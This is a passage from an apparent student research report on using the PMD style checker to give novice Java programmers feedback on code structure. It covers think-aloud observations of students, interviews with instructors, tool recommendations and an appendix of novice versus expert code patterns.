When being introduced to PMD, Participant 4 was told, “We have something here that checks code style,” to which they said, “Oh really? That's really cool!” indicating that they were enthusiastic about the concept. Participant 3 ran PMD again after their structure revisions, unprompted, saying, “Let's see if PMD still likes me.” PMD had no feedback, and observing this, the student said, “Seems like it does,” echoing the way they had talked about PMD earlier in the task when they said, “If it yells at me that's ok.” The way they anthropomorphized PMD suggests they developed a certain rapport with it, even though they had only used it briefly. When Participant 4 revised their isStrictlyPositive implementation to use the ternary operator, they said, “well, ok. That should hopefully solve the feedback,” suggesting that they were thinking of the PMD feedback as a single, external problem that needed to be solved.
Additional Observations
After resolving PMD’s feedback for isStrictlyPositive, Participant 3 asked if the code runs slightly faster without the if-statement, showing an interest in the performance implications of code structure choices. After revising, Participants 1, 3, and 4 all made very similar statements, declaring that they were going to let the unit tests determine the correctness of their code for them. This marked an interesting shift in the
writing process where their perception of the task seemed to change from “implement this method based on this Javadoc” to “pass these unit tests.” For example, one student said, “... I'm going to run the tests to see if it works.” Another took several tries to correct the error, and along the way, they would make a small change and then run the tests again without pausing to evaluate the correctness or style of the code themselves. This pattern is interesting because it might be indicative of student modes of interaction with the PMD style tool if it becomes ubiquitous in the same way unit tests have.
Participant 4 resolved PMD’s feedback for isStrictlyPositive by using a ternary operator (see Figure 9). Seeing the feedback disappear, they said, “So that made it work? I mean, it's cleaner code, so that makes sense,” suggesting that although they had correctly interpreted the disappearance of the feedback, they had also over-interpreted the false negative to reinforce their concept of cleaner code. They were then prompted to see if they could make the code even cleaner, to which they responded, “Oh! Yeah, I'm overcomplicating, aren't I?” Without any example or explanation, just a suggestion to try, they utilized the expert pattern and returned the Boolean expression directly, indicating that they had enough experience to identify and revise a structure issue using their own judgment when given a simple, generic prompt to improve their code.
Participant 1 was reminded that they had stated that they didn't like that they were returning “Not Ok” in two different places in the code for the okNotOk task. In response, the student revised their code, pointing out that they were making use of short-circuiting. Participant 3 was prompted similarly, and in response they started to brainstorm out loud, saying that they thought they could cover all the “Not Ok” cases in one if-statement and then return “Ok” in the else case.
Both participants revised their code to look like Figure 6 without any additional prompting. In both cases, this revision required them to flip the condition of their previous fix (so, `numBot != 0` instead of `numBot == 0`), suggesting that they were thinking about the correctness implications of their style revision, not carelessly moving chunks of code around.
THINK-ALOUD DISCUSSION
Think-aloud results that were enriched when contextualized by the instructor interviews are addressed later in the Combined Discussion. Think-aloud results which were interesting and useful independent of the instructor interviews are analyzed here.
Instruction Recommendations
More of the students who read the entire Javadoc before coding produced correct, expert-structured code than did students who solved the tasks with a one-to-one approach (e.g. reading a line of the Javadoc and then writing a line of code). This suggests that instructors should emphasize the benefits and importance of coding in a systematic way with discrete steps, as part of teaching students to use good style. Some examples of systematic approaches that students used successfully during think-alouds were: saying pseudocode out loud before writing actual code, reading all available information and summarizing it, or explicitly formulating a starting point and an end point for the problem before defining the path of the solution.
Some students already care about style and have well-reasoned, sophisticated intent behind style choices, even those choices that contradict the expert code structures. On the other hand, some students seemed to just care about making PMD happy. They saw style as a personal preference, not as a vehicle for intent, and PMD’s feedback did not necessarily reshape their personal preferences. They simply made the necessary
changes to make the feedback go away. It is important that instruction on style not be prescriptive. Some leeway needs to be afforded for thoughtfully argued style choices, and some instruction time may need to be devoted to introducing students to the idea that there are tangible arguments for writing code a certain way. For example, code structure carries meaning for the reader, and well-chosen structures can prevent or expose bugs.
Tool Design Recommendations
One student encountered a usability error where PMD did not re-run because they had not saved their changes. An experienced programmer encountering this issue would likely be able to narrow down the reason for this behavior, but for a novice programmer who is using PMD for learning, this is problematic. It was not apparent to them that the tool had not run, and the student was confused that their changes did not cause any changes in PMD’s feedback. This could be improved either with an error message, alerting the student to the fact that the tool had not run because they had not saved, or by providing the student some kind of very obvious visual cue when PMD does run, separate from the feedback.
INTERVIEW PARTICIPANTS AND METHODS
Instructors who have taught CS 1410, 2420, or 3500 were recruited for interviews. During recruitment, instructors were asked to bring the following to the interview: rubrics for two programming assignments where some aspect of programming other than functionality/performance was part of the rubric (one assignment from the beginning of the semester and one from the end, from their most recent offering of CS 1410 or 2420 or 3500); examples of anonymized assignments with low vs. high scores to demonstrate how the rubric was applied. Reviewing and discussing the rubrics was the first phase of the interview. Instructors were asked a mix of prepared questions and spontaneous follow-up questions, with the goal of understanding the instructor’s current process for grading and giving feedback on “style” and code structure in programming assignments, separately from their evaluation of the correctness of student code.
Following this, instructors were shown the novice coding patterns [12] (Appendix: Instructor Interview Coding Patterns Document). They were asked to identify which patterns were important to them as instructors and which patterns they observed in student code. Some patterns were presented and discussed without the concrete examples shown in the Appendix, but through discussion it was clear the instructors understood the code structures the pattern names referred to. Instructors then received a demo of the instructor-facing PMD command line tool which batch processes Java source code and outputs a file that contains details for every line of code that was flagged by PMD (see
Figure 2). The instructors were asked to interpret the output of the tool, and they were asked a mix of prepared questions and spontaneous follow-up questions with the goal of gauging how the instructor might incorporate the tool into their grading and feedback process, how they would want to see the tool extended, and what feedback they had about the tool and its output.
Time and interest permitting, instructors also received a demo of the student-facing PMD Eclipse plug-in, and they were asked for their feedback on the usefulness of the tool, their thoughts on how they would like to see it extended, and their thoughts on how they might incorporate this tool in their teaching and feedback process. At the conclusion of the interview, instructors were given a final opportunity to critique the instructor-facing tool.
INTERVIEW RESULTS
How Do Instructors Teach, Evaluate, and Give Feedback on Style?
The instructors’ current processes for evaluating student code structure and style was the first focus of the interviews. Three of the four instructors interviewed provided at least two homework assignment rubrics that included at least one rubric item that focused on some aspect of the code other than correctness. These rubric items tended to be things like “Style & Design” or “Documentation & Style,” and students would earn points in these categories for things like following instructions to replace certain comments with specific information, using helper methods, including Javadoc comments on every method, class, and instance variable, using whitespace and brackets consistently, and including in-line comments where the code was “unusual or complex” (citing a rubric from CS 2420). The current rubrics do not explicitly address code structure, and all instructors noted that any specific feedback provided to the students regarding their code style and design was dependent on the judgement and time constraints of the TA’s.
Although these code structures do not get addressed in assignment rubrics, instructors do spend time on them in lecture. Several instructors said that they code in front of the class during lectures, and as they’re going, they comment on why they’re choosing to structure their code a certain way. One instructor requires CS 1410 students to attend weekly group sessions where four students get together with a TA to look at examples of student code from the most recent assignment and discuss ways the code
could be written in a more elegantly or could be improved to better express the underlying ideas.
All instructors noted that this kind of feedback and instruction is needed. One instructor noted that these structure issues “... may escape the autograder. The program is correct, but it is horrible.” Another instructor indicated that even though they lecture about these topics, “... this is a problem with a large CS course with complicated programs and a huge number of students. The students are able to write bad code that works, and the test cases will say ‘Good job. You get most of the credit.’” This seems to indicate that there’s a scalability barrier facing instructors and TA’s when providing targeted feedback to students on their code structure choices.
While some instructors had better visibility than others into their students’ current mastery of these code structures and their progress, no instructors had precise, accurate visibility. When looking at the output from the instructor-facing PMD tool, one instructor was surprised when the percentage of students whose code was flagged by the tool was roughly double what they had estimated, suggesting that although instructors are aware that students are using these novice patterns, they might be underestimating how prevalent they are across the whole class. Another instructor said that they’ve surveyed their CS 1410 and CS 3505 classes about their preferences on the Simplify Boolean Returns pattern. They remarked that they were surprised to learn that half the students in CS 3505 still preferred the novice pattern. Again, this seems to show that instructors do not have an accurate sense of students’ progress with regard to style, that they have a tendency to underestimate the prevalence of these patterns, and that getting a clearer picture of what’s happening is interesting and important to them. Another instructor said
that the large class sizes make it so that they do not actually look at student code, except in very rare cases, and they added that this was “sad,” again suggesting that understanding what students are doing is important to instructors, and instructors think it’s a problem that there’s currently no scalable way to do this.
Instructors currently teach style by demonstration, and they do not evaluate students’ use of code structure. They rely on TA’s to use their judgement to grade and give feedback on aspects of style such as whitespace, comments, and brace placement. Scalability is a barrier to accurately perceiving student progress with regard to style.
Instructor Opinions on Style Instruction Over the Course of the Degree
One instructor reviewed the Simplify Boolean Returns pattern and remarked, “Students in all classes do this. 1410. 3500. Doesn’t matter,” and other instructors echoed this, saying that they see almost no improvement in how students structure their code after three semesters of programming instruction. This seems to imply that instructors want students to improve their use of code structure and to use expert patterns by the time they reach CS 3505, the fourth course in the series of major requirements, but students are not meeting these expectations. Given that instructors want to see students using expert patterns by CS 3505, at what point in the degree would they want to start giving instruction, feedback, and grades based on these patterns? One instructor who teaches CS 1410 and 2420 observed, “These habits, the longer you do them the harder it’s going to be to undo them,” suggesting they would prioritize addressing them for practical reasons. All instructors said that these patterns are appropriate subject matter for CS 1410.
Teaching students about these patterns and evaluating their use of them in CS
1410 comes with certain challenges. As one instructor observed, “1410 is their first semester of programming and ... they feel so triumphant just when it compiles. For you to tell them like ‘yeah, it compiles, and it works, but really you should be doing something else here…’ might be too much for them. I don't know. … But the question would be ‘Are the students comfortable enough with their own programming to really get anything out of it then?’ And I don't know the answer. I suspect some are, but some probably aren't,” suggesting that there’s uncertainty about how effective this instruction would be in CS 1410. Another instructor who also felt that code maintainability should be combined with code development from the beginning indicated that there wasn’t enough time to include it along with everything else that’s taught in CS 1410. Time came up as a limiting factor for a CS 2420 instructor as well, and despite the fact that they had previously observed that CS 2420 is not a programming class, they concluded, “… if it doesn't get cleared up in 1410 I think it's almost worthwhile to make sure it gets cleared up in 2420 and not have it persist into later classes. … maybe it's worth sacrificing not getting to cover something else.” Together, these instructors’ thoughts seem to suggest that the current curriculum is already very packed and including something new may require instructors to be willing to make tradeoffs.
Instructors want to address these code structures early in the degree because the material is appropriate to the early courses and the longer bad habits persist, the harder they are harder to break. Instructors of non-programming courses are willing to sacrifice instruction time in those courses to ensure that students build these skills early in the degree. Instructors are uncertain at what stage in the degree students would be ready to incorporate these concepts into their programming.
Do Instructors Perceive that Students Use These Patterns? Does It Matter to Them?
Of the patterns presented (Appendix: Instructor Interview Coding Patterns), all instructors said that they observed students using novice structure for the following patterns and the instructors felt that it was problematic: Simplifying Boolean Returns, Repeating Code Within an If-Block and Else-Block, Splitting Out Special Cases When the General Solution is Present, and If-Statements for Exclusive Cases. All instructors observed students using novice structure for the Collapsible If Statements pattern, but one instructor felt that in some cases there are varying opinions even among experts on how to approach this pattern. All instructors observed students using novice structure for the While-Loop When a For-Loop is More Appropriate, but one pointed out that this pattern could be language dependent and another observed that students tended to prefer whichever loop they learned first and they felt this was not a problem.
One instructor based their evaluation of the patterns partly on whether the novice-structured pattern produced inefficient assembly code. All instructors indicated that certain patterns, such Simplifying Boolean Returns, were important to them because they were more likely to cause bugs and be difficult to modify. Three instructors noted that the use of certain novice patterns was important to them because it indicated to them that the code’s author had a shallow understanding of the underlying concepts. For example, repeating code within an if-block and else-block was an indication that the student did not understand which parts of the logic were actually conditional. Using if-statements for exclusive cases indicated to instructors that the student did not completely understand the enumeration and separation of the possible cases.
How Do Instructors Want to Use the Instructor-Facing Tool?
While no instructors wanted to directly use the spreadsheet of raw data output by the instructor-facing PMD tool, all of them were interested in seeing it extended. Instructors had user interface extension ideas. Three instructors wanted to see the tool incorporated as an autograder where students would lose points for using novice patterns. Two were interested in seeing a graphical summary of output, such as a pie chart displaying what percentage of students used a certain pattern, or a bar graph showing the percentage of students who had multiple flags, with the intent of using the summary to choose what to emphasize in lecture. All instructors wanted to use the tool to provide students targeted, personalized feedback by automating the detection and flagging of problematic code. Instructors also had functionality-related concerns. All instructors wanted to see a verification of the robustness and correctness of the tool. Some questions they specifically wanted answered are: Does the code actually demonstrate the pattern the tool caught? Is there overlap between the tool’s patterns? Are there any known cases that give false positives? Ultimately, instructors want to use the tool to better scale grading and feedback on these code structures, either through automated grading or an improved visualization of the data, and they want an empirical understanding of the reliability of the tool.
How do Instructors Want to Use the Student-Facing Tool?
Instructors also provided input on how they would want to use the student-facing tool and how they’d want to see it improved. Some instructors wanted students to have PMD freely available as an Eclipse plug-in that runs automatically at compile-time while
they’re coding their homework. Others envisioned only allowing students to run it on their code after they got their grades back, with a window of time where students could correct their flagged issues and resubmit to earn some points back.
One instructor is currently emphasizing positive feedback in their current rubrics and was interested in whether PMD could catch and flag positive things in student code, such as use of expert patterns. Another instructor was interested in whether PMD could catch use of inappropriate syntax, such as some unusual and unnecessarily complex code that was copy-pasted from Stack Overflow.
All instructors indicated that the tool needed to provide more explanation to students when a pattern is flagged. Some suggested linking to a website with additional details or showing side-by-side examples in Eclipse, while others suggested showing an embedded video or making the student take a quiz to demonstrate their understanding of the pattern. Instructors also emphasized that the phrasing of the feedback would not be clear to a student who is using these patterns in the first place, and one instructor suggested rephrasing the feedback in a way that was actionable or making it suggest to the student that they think carefully and reconsider their code structure choice. Instructors also wanted to give students a way to know they had preserved the logic of their original code if they made changes based on the tool’s feedback.
Instructors want the tool to give more comprehensive, instructive feedback to the student, including positive feedback for use of expert code structures and assurance that the code’s logic was unchanged as a result of the structure revision. Three instructors wanted students to have the tool while they coded, and one instructor wanted students to only have access to the tool after they submitted their assignment.
INTERVIEW DISCUSSION
Using the Tool to Address Scalability Issues
Current style grading and feedback processes do not scale well to large class sizes, and so instructors aren’t able to assess and target style effectively. The instructor-facing tool has the ability to provide instructors detailed insight into students’ progress and persistent or prevalent gaps in the class’s command of specific code structures. No instructors want to interface with the output of the tool the way it currently is presented, but all of them were interested in using it to get an understanding of which patterns students are struggling with so they could adapt their instruction. Incorporating a graphical user-interface (GUI) that visualizes the data the tool already outputs as a bar graph or pie chart will be an important next step, and it will be an easy improvement to make. These graphs would convey statistical information that instructors are interested in, such as the number of occurrences of each novice pattern across all assignments or the percentage of students that used a given novice pattern. Another round of feedback from instructors would be valuable once an initial prototype of the GUI is ready.
Another shortcoming in the current style feedback process is that there’s a delay of a week or more between students composing the code and receiving feedback. Instructors indicated that this makes it difficult to hold students accountable on the following assignments for having learned from style mistakes on previous assignments. To address this, some instructors indicated that they would want students to have access
to the student-facing tool throughout their coding process, and others indicated that they would want students to be able to use the tool to correct mistakes and earn back points on their assignment only after it had been graded for style. Withholding the student-facing tool will prevent it from masking gaps in students’ command of style, but the approach the instructor suggested would require a round of regrading. More investigation needs to be done to understand whether this visibility into students’ command of style is the only reason instructors would want to withhold the tool. If this is the only reason, perhaps other approaches, such as logging student revisions and the tool’s feedback, would provide that insight without requiring a second round of grading.
If the tool can be shown to be reliable, instructors would want to use it as part of the grading process. They said they would use it as an autograder because they believe that students will make changes to the way they code if it means they’ll get more points. Instructors would also want to use it to help TA’s provide students more targeted feedback. All instructors were concerned with the current logistics of having TA’s give detailed feedback. They explained that asking TA’s to style feedback historically has not made much of a difference partly because the time it takes to leave detailed feedback doesn’t scale well in large classes and the variance in judgment among the TA’s when reading code. Extending the tool so that its output works with Gradescope autograding and in-line comment feature would be a valuable next step in making this tool meet instructors’ needs.
Tool Design Recommendations
Instructors want to know if the tool is reliable before they incorporate it into their teaching, feedback, and evaluation workflow, so investigating and reporting the accuracy of the tool will be an important next step toward instructors using the tool. At this point in development, there have been cases of duplication of feedback for Collapsible If Statements; when this pattern is caught by multiple PMD rules, it is flagged multiple times, giving an inflated impression of the prevalence of this pattern (see Figures 2 and 3). Some versions of the Simplify Boolean Return and Collapsible If Statement patterns are not detected currently (see Tables 1 and 2), such as non-idiomatic use of the ternary operator, leading to false negatives. To evaluate the tool’s reliability, its output and the code it was run on need to be inspected by hand for false negatives, false positives, and duplicate feedback.
Next Research Steps and Instructional Design Recommendations
The instructors’ perception that the Repeating Code Within an If-Block and Else-Block, Splitting Out Special Cases When the General Solution is Present, and If-Statements for Exclusive Cases patterns are entangled with the student’s understanding of the problem space and the flow of logic suggests that there’s another layer to teaching and learning about code structure that needs to be accounted for when designing the student-facing tool. Investigating this theory is an important next step because if this theory is accurate, it will mean that instructors will need to take extra steps to determine and address the root cause of the issue.
Instructors want students to learn style and maintainability starting in their very
first programming class, but instructors also expressed uncertainty about whether CS 1410 students would be “ready” to learn to integrate expert patterns effectively in their programming. Therefore, a next research step will be to investigate what practices and concepts CS 1410 and CS 2420 students learn and retain from the tool. In pursuit of that research question, the tool would need to be adapted to log the writing and revising steps the author goes through and the feedback they are presented at each step.
As stated above, instructors are unsure if students will be comfortable enough with their own programming in CS 1410 to learn from the student-facing tool. One CS 2420 instructor indicated CS 2420 isn’t a programming class, and so code structure isn’t emphasized there currently. However, that same instructor said that it’s so important to address these novice code patterns that they would consider devoting time to it in CS 2420 to make sure these problems don’t persist beyond that point. If most CS 1410 students aren’t at a point where the tool can make a measurable difference in their command of expert patterns, and there isn’t time to adequately address these patterns in CS 2420, then the curriculum needs to be adapted.
One CS 1410 instructor interviewed has recently started to incorporate weekly, TA-guided code review sessions where four students spend roughly ten minutes discussing ways to improve a provided code sample, taken from an anonymous submission to the most recent homework assignment. Research shows that pedagogical code reviews such as this in a first-semester CS course context can lead to improved student code quality, a stronger sense of community, and increasingly sophisticated discussions of programming issues and practices [4]. This process should be adopted universally in all offerings of CS 1410. The pedagogical code review designed by
Hundhausen et al. [4] was staged over the course of a semester into 3 sessions, each 170 minutes long and consisting of 21 participants. This model may be too resource intensive and may need to be adapted to fit in the context of CS 1410, which already has a demanding, weekly lab component. The rules used by PMD can be incorporated into the checklist of best practices that students use to examine each other’s code. Introducing first- or second-semester students to code patterns and style in this guided and structured way lays a strong foundation that can then be expanded on in CS 2420.
Rather than removing material from CS 2420 and replacing it with these topics, a one credit-hour co-requisite for CS 2420 should be introduced. Skills and topics covered and practiced in this class would then be reinforced by grading and feedback in CS 2420. One implementation of this kind of class [15] found that the quality control of the feedback given to students and the cost of running the course was a concern when transitioning to a larger scale (100 students). PMD could be extended to address this concern, improving the student experience and easing the burden on instructors.
Programming exercises specifically targeting the relevant code structures would need to be developed, and the tool would need to be able to track and report student progress. These would be substantial tasks. The student-facing tool doesn’t currently record any data, such as error messages, file snapshots, or keystrokes between runs.
COMBINED DISCUSSION
Tool and Instructional Design Recommendations
When students wrote code that used expert patterns during the think-alouds, PMD gave no feedback, and this was confusing to students. One instructor indicated that they want students to receive specific, positive feedback on things they did well in their assignments. Extending PMD so that it flags expert patterns and provides positive feedback on them would help address this usability issue students encountered, it would help students recognize when they’ve used expert structure, and it would provide a feature that an instructor wants.
When PMD flagged novice patterns during the think-aloud, students did not consistently interpret the feedback correctly. All instructors expressed concern that the current PMD feedback is insufficient for teaching students why and how they should use expert patterns. For example, the felt that highlighting an instance of the Simplify Boolean Returns pattern in the student’s code and telling them to “Avoid unnecessary if..then..else statements,” would not effectively convey a motivation or explanation for coding a different way, especially to someone who is using that pattern in the first place. Three of the four instructors also expressed concerns that the feedback was not worded in an actionable way. PMD’s feedback needs to be revised to be more actionable and to provide information that would be significant and useful to a student who is learning how and why to use these patterns.
When revising their code for style, all students but one were clearly aware of the correctness implications of their revisions and did not blindly copy and paste code. Still, most students expressed uncertainty about whether their revision did the same thing as their original code. One instructor pointed out that when students come for help with their code, and their code is needlessly complex and difficult to understand and change, the students are extremely averse to suggestions to modify their code to improve its readability or maintainability. The instructor theorized that this is because the students had already put so much work into the code that they didn’t want to spend time fixing something that (probably) wasn’t broken and risk introducing new problems. Extending the tool so it could determine and convey whether the student’s change preserved the original logic would help address this resistance and hesitancy. This extension would be difficult. Deciding when this feature runs and incorporating its functionality into the existing tool logic is one concern, but in addition to this, determining the semantics of a piece of code at compile time is difficult (more difficult for some patterns than others).
Next Research Steps
Students’ word choices while thinking out loud raised questions about how best to phrase the tool’s feedback. While completing the isStrictlyPositive task, Participant 4 used the term “statement” correctly at times (e.g. “make it a single line statement”) and incorrectly at other times (e.g. “for a return type where they actually make it a Boolean statement itself”). This is interesting because it suggests either the student knows the correct terms (and just is using the wrong terms by mistake or by lack of attention to detail) or the student has an incorrect understanding of the difference
between a statement and an expression. This distinction will affect the wording of the PMD feedback. This student misinterpreted the current feedback, but would they know what to do if it instead said something like, “Return the Boolean expression directly”? Or would that lead to more confusion if they're not confident about what an expression is?
When investigating the effectiveness of error messaging in DrRacket, Marceau et al. [8] noted from interviews with students that:
[S]tudents misused words, or used long and inaccurate phrases instead of using the precise technical terms when describing code,” and “…some exchanges during the interview suggested that the students’ poor command of the vocabulary undermined their ability to respond to the messages (Marceau et al., 2011, p. 3).
Understanding how this finding applies to student interactions with PMD also tie in with instructor concerns about what course in the degree would be most appropriate for students to use the tool. The level of vocabulary used in the tool’s feedback needs to match the level of vocabulary that the student has learned.
Another dimension of the feedback is its intent. All instructors interviewed want the PMD feedback to be more actionable. However, Marceau et al [8] specifically recommended against error messages that propose a solution in the case where the suggested fix might not cover all cases. Testing whether or not actionable feedback from PMD can always be applied to the flagged code needs to be included as part of investigating the reliability of the tool and refining the phrasing of the feedback.
CONCLUSION
PMD flagged the code structures it was expected to, and students had some success at interpreting its feedback and revising their code structures. PMD’s feedback still needs reworking to better facilitate learning. Instructors want to incorporate the student-facing tool and batch-processing tool in their workflow, but they want more detailed information about the tool's reliability and the output of the instructor-facing tool needs to be made user-friendly.
APPENDIX: THINK-ALOUD TASKS
```java
/*
* This method takes in an int and returns a boolean.
* Returns true if the following condition is met:
* the input is positive
* Returns false if either of the following conditions are met:
* the input is 0
* the input is negative
*/
public static boolean isStrictlyPositive(int input) {
}
/*
* This method takes in 2 ints and returns a String;
* Returns "Ok" when the input meets BOTH of these conditions:
* numTop divided by numBot is greater than or equal to 7
* numTop times numBot is greater than or equal to 128
* Otherwise, returns "Not Ok"
*/
public static String okNotOk(int numTop, int numBot) {
}
```
Simplify Boolean Returns Pattern
Novice Version 1
if (i == 1) {
return true;
} else {
return false;
}
Novice Version 2
boolean isNull = false;
if (head == null) {
isNull = true;
}
Novice Version 3
boolean b;
if (i == 1) {
b = true;
} else {
b = false;
}
return b;
Novice Version 4
return i == 1 ? true : false;
Expert Version
return i == 1;
Collapsible If Statements Pattern
Novice Version 1
if (num != 0) {
if (num != 1) {
return "Ok";
}
return "Not Ok";
}
return "Not Ok";
Novice Version 2
if (min < num) {
return max > 1;
}
return false;
Novice Version 3
if (min == 0) {
return "Not Ok";
}
if (max/min > 0) {
return "Ok";
}
return "Not Ok";
Expert Version 1
return min < num && max > 1;
Expert Version 2
```java
if (min != 0 && max/min > 0) {
return "Ok";
}
return "Not Ok";
```
**While Loop Should Be For Loop Pattern**
**Novice Version 1**
```java
int i = 2;
while (i < array.length) {
array[i] = array[i] + 2;
i++;
}
return array;
```
**Expert Version**
```java
for (int i = 2; i < array.length; i++) {
array[i] = array[i] + 2;
}
return array;
```
**Repeating Code Within an If-block and Else-block Pattern**
**Novice Version 1**
```java
String name;
double price);
double discountPrice;
double over50Discount = .2;
double discount = .1;
if (price > 50) {
```
discountPrice = price * (1 - over50Discount);
return "The original price of " + name + " was $" + price + " but you get a discount of " + over50Discount + " so you only pay $" + discountPrice;
} else {
discountPrice = price * (1 - discount);
return "The original price of " + name + " was $" + price + " but you get a discount of " + discount + " so you only pay $" + discountPrice;
}
Expert Version
double sale = 0.25;
double specialSale = 0.5;
double over50Sale = 0.35;
double actualSale = 0;
String beginning = "Your item, " + item + ", usually costs " + price + ", but ";
String ending = "you are getting it for ";
if(item.equals("socks") && coupon) {
beginning += "since you have a coupon, ";
actualSale = specialSale;
}
else if (price > 50) {
beginning += "since it is over 50, ";
actualSale = over50Sale;
}
else
actualSale = sale;
String realEnding = "Congratulations!! you saved ";
double savings = price - price * (1-actualSale);
realEnding += savings + ";";
return beginning + ending + price * (1 - actualSale) +
realEnding;
**Splitting out a Special Case When the General Solution is Present Pattern**
Novice Version 1
if (first.length() != second.length()) {
return first + " and " + second + " do not have the same
letters.";
}
char letters1[] = first.toCharArray();
char letters2[] = second.toCharArray();
Arrays.sort(letters1);
Arrays.sort(letters2);
if (Arrays.equals(letters1, letters2)) {
return first + " has the same letters as " + second;
}
return first + " and " + second + " do not have the same letters.";
Expert Version
char letters1[] = first.toCharArray();
char letters2[] = second.toCharArray();
Arrays.sort(letters1);
Arrays.sort(letters2);
if (Arrays.equals(letters1, letters2)) {
return first + " has the same letters as " + second;
}
return first + " and " + second + " do not have the same letters.";
If-Statements for Exclusive Cases (Rather Than If-Else) Pattern
Novice Version 1
String size = "";
if (i < 10) {
size = "small";
if (i >= 10 && i < 20) {
size = "medium";
}
if (i >= 20) {
size = "big";
}
return "The size is " + size;
Expert Version
String size = "";
if (i < 10) {
size = "small";
}
else if (i >= 10 && i < 20) {
size = "medium";
}
else {
size = "big";
}
return "The size is " + size;
REFERENCES
|
{"Source-Url": "https://our.utah.edu/wp-content/uploads/sites/19/2020/05/anderson_j.pdf", "len_cl100k_base": 15038, "olmocr-version": "0.1.50", "pdf-total-pages": 59, "total-fallback-pages": 0, "total-input-tokens": 118925, "total-output-tokens": 18610, "length": "2e13", "weborganizer": {"__label__adult": 0.0009784698486328125, "__label__art_design": 0.0012197494506835938, "__label__crime_law": 0.0006117820739746094, "__label__education_jobs": 0.0767822265625, "__label__entertainment": 0.0002498626708984375, "__label__fashion_beauty": 0.0004575252532958984, "__label__finance_business": 0.0008401870727539062, "__label__food_dining": 0.0009517669677734376, "__label__games": 0.0013914108276367188, "__label__hardware": 0.0010366439819335938, "__label__health": 0.0007543563842773438, "__label__history": 0.0006532669067382812, "__label__home_hobbies": 0.0003082752227783203, "__label__industrial": 0.0006613731384277344, "__label__literature": 0.001010894775390625, "__label__politics": 0.0009064674377441406, "__label__religion": 0.0011186599731445312, "__label__science_tech": 0.00444793701171875, "__label__social_life": 0.00057220458984375, "__label__software": 0.006381988525390625, "__label__software_dev": 0.89599609375, "__label__sports_fitness": 0.0007700920104980469, "__label__transportation": 0.0012807846069335938, "__label__travel": 0.0005044937133789062}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 79859, 0.01625]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 79859, 0.50437]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 79859, 0.93519]], "google_gemma-3-12b-it_contains_pii": [[0, 176, false], [176, 176, null], [176, 1748, null], [1748, 2443, null], [2443, 5391, null], [5391, 7093, null], [7093, 9245, null], [9245, 10597, null], [10597, 12005, null], [12005, 12877, null], [12877, 13391, null], [13391, 15002, null], [15002, 16030, null], [16030, 16926, null], [16926, 18256, null], [18256, 19631, null], [19631, 21500, null], [21500, 23439, null], [23439, 24847, null], [24847, 26211, null], [26211, 28087, null], [28087, 29792, null], [29792, 31338, null], [31338, 33299, null], [33299, 35123, null], [35123, 36679, null], [36679, 38198, null], [38198, 40146, null], [40146, 40512, null], [40512, 41978, null], [41978, 43152, null], [43152, 44794, null], [44794, 45622, null], [45622, 47252, null], [47252, 49158, null], [49158, 51032, null], [51032, 52967, null], [52967, 54829, null], [54829, 56613, null], [56613, 58502, null], [58502, 60130, null], [60130, 61787, null], [61787, 63517, null], [63517, 65415, null], [65415, 66936, null], [66936, 68443, null], [68443, 70292, null], [70292, 71903, null], [71903, 72377, null], [72377, 73055, null], [73055, 73421, null], [73421, 73806, null], [73806, 74407, null], [74407, 75153, null], [75153, 75795, null], [75795, 76429, null], [76429, 76724, null], [76724, 78853, null], [78853, 79859, null]], "google_gemma-3-12b-it_is_public_document": [[0, 176, true], [176, 176, null], [176, 1748, null], [1748, 2443, null], [2443, 5391, null], [5391, 7093, null], [7093, 9245, null], [9245, 10597, null], [10597, 12005, null], [12005, 12877, null], [12877, 13391, null], [13391, 15002, null], [15002, 16030, null], [16030, 16926, null], [16926, 18256, null], [18256, 19631, null], [19631, 21500, null], [21500, 23439, null], [23439, 24847, null], [24847, 26211, null], [26211, 28087, null], [28087, 29792, null], [29792, 31338, null], [31338, 33299, null], [33299, 35123, null], [35123, 36679, null], [36679, 38198, null], [38198, 40146, null], [40146, 40512, null], [40512, 41978, null], [41978, 43152, null], [43152, 44794, null], [44794, 45622, null], [45622, 47252, null], [47252, 49158, null], [49158, 51032, null], [51032, 52967, null], [52967, 54829, null], [54829, 56613, null], [56613, 58502, null], [58502, 60130, null], [60130, 61787, null], [61787, 63517, null], [63517, 65415, null], [65415, 66936, null], [66936, 68443, null], [68443, 70292, null], [70292, 71903, null], [71903, 72377, null], [72377, 73055, null], [73055, 73421, null], [73421, 73806, null], [73806, 74407, null], [74407, 75153, null], [75153, 75795, null], [75795, 76429, null], [76429, 76724, null], [76724, 78853, null], [78853, 79859, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 79859, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 79859, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 79859, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 79859, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 79859, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 79859, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 79859, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 79859, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 79859, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 79859, null]], "pdf_page_numbers": [[0, 176, 1], [176, 176, 2], [176, 1748, 3], [1748, 2443, 4], [2443, 5391, 5], [5391, 7093, 6], [7093, 9245, 7], [9245, 10597, 8], [10597, 12005, 9], [12005, 12877, 10], [12877, 13391, 11], [13391, 15002, 12], [15002, 16030, 13], [16030, 16926, 14], [16926, 18256, 15], [18256, 19631, 16], [19631, 21500, 17], [21500, 23439, 18], [23439, 24847, 19], [24847, 26211, 20], [26211, 28087, 21], [28087, 29792, 22], [29792, 31338, 23], [31338, 33299, 24], [33299, 35123, 25], [35123, 36679, 26], [36679, 38198, 27], [38198, 40146, 28], [40146, 40512, 29], [40512, 41978, 30], [41978, 43152, 31], [43152, 44794, 32], [44794, 45622, 33], [45622, 47252, 34], [47252, 49158, 35], [49158, 